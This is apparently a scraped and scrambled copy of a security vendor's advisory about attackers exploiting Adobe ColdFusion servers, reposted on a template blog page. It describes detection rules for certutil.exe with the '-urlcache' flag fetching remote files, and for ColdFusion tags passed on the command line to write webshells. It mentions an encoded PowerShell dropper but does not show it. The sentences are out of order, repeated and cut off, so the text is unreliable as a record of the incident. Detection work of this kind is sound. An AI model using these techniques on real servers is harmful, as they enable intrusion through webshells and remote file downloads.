Look for *.cfm files in ColdFusion webroots containing the following ColdFusion tags: This technique has been observed by malicious actors redirecting strings into files while creating webshells. This technique is used by malicious actors to retrieve files hosted on a remote web server and write them to disk. This detection identifies the use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it. This technique is used by malicious actors when redirecting strings into files when creating webshells.Īttacker Technique - CertUtil With URLCache Flag This detection identifies common ColdFusion tags being passed in the command line. Webshell - Possible ColdFusion Webshell In Command Line In our current investigations, previously existing and new detections have been observed triggering post exploitation across Rapid7 InsightIDR and Managed Detection & Response (MDR) customers: Process start data indicates that ColdFusion 2018 is spawning malicious commands.Įxample base64 encoded command executed by malicious actor through ColdFusion: Rapid7 discovered evidence indicating that a malicious actor dropped webshells using an encoded PowerShell command. The earliest time frame of compromise identified thus far occurred in early January 2023. We have also observed the compromised website, ooshirtscom, being used in other attacks dating back to March 2022. Rapid7 has existing detection rules within InsightIDR that have identified this activity and have created additional rules based upon this observed behavior. The observed activity dates back to January 2023 and has not been tied back to a specific CVE at this time. Rapid7’s Threat Intelligence and Detection Engineering team has identified active exploitation of Adobe ColdFusion in multiple customer environments.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |